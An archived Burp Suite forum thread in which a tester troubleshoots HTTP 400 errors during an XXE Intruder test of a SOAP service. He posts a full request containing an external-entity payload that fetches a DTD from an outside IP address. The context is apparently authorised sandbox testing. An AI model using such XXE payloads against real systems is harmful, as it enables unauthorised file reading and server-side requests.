Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

XML appears good, but Burp keeps giving me a "400" error during XXE Intruder attacks

Mike | Last updated: Jan 10, 2017 08:21PM UTC

I'm kind of at a loss and need another set of eyes. I'm attempting to set up XXE attack (Sniper) so we can test a fix, but I keep getting a "400 bad request" message. The payload I am using is as follows: POST /SettingsService/AnalysisSettingService HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://services.moodyskmv.com/riskfrontier/2007/06/AnalysisSettingService/GetAnalysisSettingById" Host: sbv-swt-rf-ap1:8086 Content-Length: 669 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: close <!DOCTYPE stratum [<!ENTITY xxe SYSTEM "http://10.6.156.47/dtd.txt">]><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Header><TokenIdentifier xmlns="http://services.moodyskmv.com/riskfrontier/2007/06">e06423ea-b9c4-41b0-8dbc-4682149edb6f</TokenIdentifier></s:Header><s:Body><GetAnalysisSettingByIdRequest xmlns= "http://services.moodyskmv.com/riskfrontier/2007/06"><AnalysisSettingId xmlns:a="http://schemas.moodyskmv.com/riskfrontier/2007/06" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:Code>&xxe;</a:Code><a:Id>§3§</a:Id></AnalysisSettingId><AsOfDate>2016-10-25T00:00:00-07:00</AsOfDate></GetAnalysisSettingByIdRequest></s:Body></s:Envelope> The XML output after the test is as follows: <!DOCTYPE xxetest [<!ENTITY xxe SYSTEM "http://10.6.156.47/dtd.txt"> ]> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"> <s:Header> <TokenIdentifier xmlns="http://services.moodyskmv.com/riskfrontier/2007/06">e06423ea-b9c4-41b0-8dbc-4682149edb6f</TokenIdentifier> </s:Header> <s:Body> <GetAnalysisSettingByIdRequest xmlns= "http://services.moodyskmv.com/riskfrontier/2007/06"> <AnalysisSettingId xmlns:a="http://schemas.moodyskmv.com/riskfrontier/2007/06" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"> <a:Code>&xxe;</a:Code> <a:Id>1</a:Id> </AnalysisSettingId> <AsOfDate>2016-10-25T00:00:00-07:00</AsOfDate> </GetAnalysisSettingByIdRequest> </s:Body> </s:Envelope> I can't seem to find where I might be violating HTTP protocol with my request. Any ideas?

PortSwigger Agent | Last updated: Jan 11, 2017 08:58AM UTC

It looks like a valid HTTP request to me. Perhaps the 400 code is due to a WAF or suchlike getting triggered? You could try sending the request to the Repeater and making strategic changes to identify the source of the problem. The Host header is syntactically valid but looks a bit unusual, so it might be related to that.

Burp User | Last updated: Jan 11, 2017 09:21PM UTC

Thanks for responding. There are no WAF's in this environment (it's what we call a sandbox with no security overhead like firewalls or AV). It does look to be something in my host header which I will continue to investigate. In repeater when I cut everything out except for the host header, I still got the same error. I sure wish the error was more descriptive. :)

Burp User | Last updated: Jan 12, 2017 11:37PM UTC